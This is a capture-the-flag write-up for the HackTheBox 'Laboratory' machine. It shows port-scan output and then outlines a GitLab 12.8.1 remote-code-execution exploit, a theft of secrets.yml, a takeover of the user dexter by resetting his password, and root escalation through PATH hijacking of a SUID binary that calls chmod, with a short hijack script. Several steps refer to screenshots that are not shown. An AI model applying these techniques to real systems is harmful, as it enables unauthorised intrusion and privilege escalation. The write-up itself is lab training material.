# HackTheBox-Laboratory ## Rustscan ``` rustscan -a 10.10.10.216 -- -A -sC -sV .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.10.216:22 Open 10.10.10.216:80 Open 10.10.10.216:443 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Did not follow redirect to https://laboratory.htb/ 443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS HEAD GET POST |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: The Laboratory | ssl-cert: Subject: commonName=laboratory.htb | Subject Alternative Name: DNS:git.laboratory.htb | Issuer: commonName=laboratory.htb | Public Key type: rsa | Public Key bits: 4096 | Signature Algorithm: sha256WithRSAEncryption ``` ## PORT 80/443 (HTTP/HTTPS) On visting port 80 I was redirected to https with a domain `laboratory.htb`

So let's add this to `/etc/hosts` file

Running dirsearch was pointless because couldn't find anything

But I did saw a subdomain from the nmap scan `git.laboratory.htb` on adding to `/etc/hosts`

We could not sign in since we have not found any users so I registered an account

On logging in we can't see anything useful

But going to help page we see the version number of gitlab which is 12.8.1

Searching an exploit for this version I found one RCE https://github.com/dotPY-hax/gitlab_RCE Edited the email for the payload

But it was not stable

I grabbed the `secrets.yml` through unstablized shell also realized that this was a docker container

It was unstable so I decide to go for metasploit https://www.rapid7.com/db/modules/exploit/multi/http/gitlab_file_read_rce/

These are the options you would have to set

And we get a bash prompt

To get a more stablized shell

I searched for `pentesting gitlab` and found a website that had some juicy information about what to look for

I saw a user `dexter` that had a a repository

But there wasn't anything intersting there looking back at that directory I saw two files having `secret` in them

Didn't found anything then I came across a report that was submitted on hackerone regarding gitlab https://hackerone.com/reports/493324

But this didn't worked so I searched for `gitlab shell change user password ` and found documentation

After going through this I came to know that we can reset a user's password on gitlab

And we logged in as `dexter`

We see a ssh key so we can login as `dexter`

There was a cron job running

But I couldn't run docker

Because we don't have permissions to execute. So here I spend a lot of time running `linpeas` , manual going through folders but found nothing then I looked for SUID

We see that it's using `chmod` so we can exploit PATH variable ``` #!/bin/bash bash ```